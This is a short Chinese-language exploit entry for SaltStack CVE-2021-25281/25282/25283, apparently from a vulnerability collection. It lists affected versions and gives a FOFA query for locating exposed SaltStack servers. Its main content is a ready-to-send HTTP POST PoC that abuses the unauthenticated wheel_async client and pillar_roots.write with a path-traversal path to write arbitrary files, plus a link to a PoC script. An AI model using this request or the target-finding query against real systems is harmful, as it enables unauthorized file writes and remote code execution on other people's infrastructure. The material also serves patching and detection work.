# Saltstack 未授权RCE漏洞 （CVE-2021-25281/25282/25283）

SaltStack套件是政企机构 IT运维管理人员常用的管理工具，利用这些漏洞，最严重情形可导致未授权远程代码执行。

漏洞分析见：https://mp.weixin.qq.com/s/QvQoTuQJVthxS07pbLWJmg

云鼎实验室：[首发分析 | SaltStack远程执行代码多个高危漏洞透析（CVE-2021-25281/25282/25283）](https://mp.weixin.qq.com/s/iu4cS_DZTs0sVVg92RBe4Q)

FOFA：

```
app="SALTSTACK-产品"
```

影响版本：

* Saltstack 3002.2之前的所有版本
* SaltStack =< 3002.2
* SaltStack =< 3001.4
* SaltStack =< 3000.6


1. salt-api wheel_async未授权访问 (CVE-2021-25281)
2. sdb rest插件模版渲染问题 (CVE-2021-25283)
3. wheel/pillar_roots.py文件任意写漏洞 (CVE-2021-25282 )

CVE-2021-25281 + CVE-2021-25282 PoC：

```
http://target/run
POST:
"client": "wheel_async",
"fun": "pillar_roots.write",
"data": "../../../../../tmp/test2",
"path": "../../../../../tmp/test2",
"username": "password",
"password": "username",
"eauth": "pam"
```

poc.py:https://github.com/Immersive-Labs-Sec/CVE-2021-25281

**ref：**

* https://saltproject.io/security_announcements/active-saltstack-cve-release-2021-feb-25/
* https://twitter.com/KevTheHermit/status/1365130814430846979
* https://github.com/Immersive-Labs-Sec/CVE-2021-25281
* https://dozer.nz/posts/saltapi-vulns